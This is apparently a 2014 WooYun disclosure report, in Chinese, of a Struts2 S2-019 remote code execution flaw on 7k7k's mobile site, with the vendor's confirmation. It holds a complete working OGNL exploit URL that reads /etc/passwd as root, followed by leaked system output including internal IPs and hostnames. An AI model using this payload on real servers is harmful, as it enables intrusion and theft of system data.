漏洞详情

披露状态:

2014-03-05: 细节已通知厂商并且等待厂商处理中
2014-03-07: 厂商已经确认,细节仅向厂商公开
2014-03-17: 细节向核心白帽子及相关领域专家公开
2014-03-27: 细节向普通白帽子公开
2014-04-06: 细节向实习白帽子公开
2014-04-19: 细节向公众公开

简要描述:

详细说明:

#1.看到奇客星空的确认漏洞如此活跃速度,于是乎就想给它挖几个漏洞,看了下奇客星空的漏洞史,偶然间看到: WooYun: 奇客星空代码执行导致分站沦陷 这个漏洞,漏洞中提到的是Struts2框架的漏洞,和我现在提交的完全不一样,并且厂商在回复中答道:已修复。为了证明厂商已经修复struts2的漏洞,特上此图:

URL:http://m.7k7k.com/about.html 这是手机版的奇客星空吧 (⊙_⊙)?



01.jpg





#2.然后想到看看有没有开debug模式试试最新的St2-019的漏洞【Apache Struts 2.3.15.2之前版本的“Dynamic Method Invocation”机制是默认开启的,仅提醒用户如果可能的情况下关闭此机制,这样就存在远程代码执行漏洞,远程攻击者可利用此漏洞在受影响应用上下文中执行任意代码。】,于是测试一下悲剧了→_→

EXP:http://m.7k7k.com/about.html?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29



02.jpg



还是root权限 =_=|

03.jpg





漏洞证明:

#3.
cat /etc/passwd/

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/

uname -a
Linux Ct-gc-bj136 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux null

ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:16:3E:13:E2:A4
inet addr:115.182.59.136 Bcast:115.182.59.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19472163956 errors:0 dropped:0 overruns:0 frame:0
TX packets:182413747 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1324808432359 (1.2 TiB) TX bytes:80369708814 (74.8 GiB)

eth1 Link encap:Ethernet HWaddr 00:16:3E:34:0A:4D
inet addr:192.168.11.136 Bcast:192.168.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1446599118 errors:0 dropped:0 overruns:0 frame:0
TX packets:1016118809 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:490211357961 (456.5 GiB) TX bytes:473975578474 (441.4 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0

cat /etc/hosts

127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6

115.182.59.176 so.7k7k.com
192.168.11.108 Ct-bj108
192.168.11.31 Ct-bj31
192.168.11.136 Ct-gc-bj136
127.0.0.1 top.7k7k.com
192.168.11.149 api.cms.7k7k.com

115.182.59.250 s.7k7k.com
115.182.59.251 s.7k7k.com
115.182.59.252 s.7k7k.com

修复方案:

PS:漏洞详情请参考:http://struts.apache.org/release/2.3.x/docs/s2-019.html,有了命令执行还怕没Webshell吗,证明一下漏洞的严重性就好,希望厂商给一个高分rank,求礼物哇=_=,第一次合作,后期再去给你找几个漏洞。

版权声明:转载请注明来源 U神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-07 23:50

厂商回复:

感谢白帽作者反馈,确实有此漏洞,已修复,之后联系作者发送小礼物,希望和白帽人员进行合作

最新状态:

暂无


漏洞评价: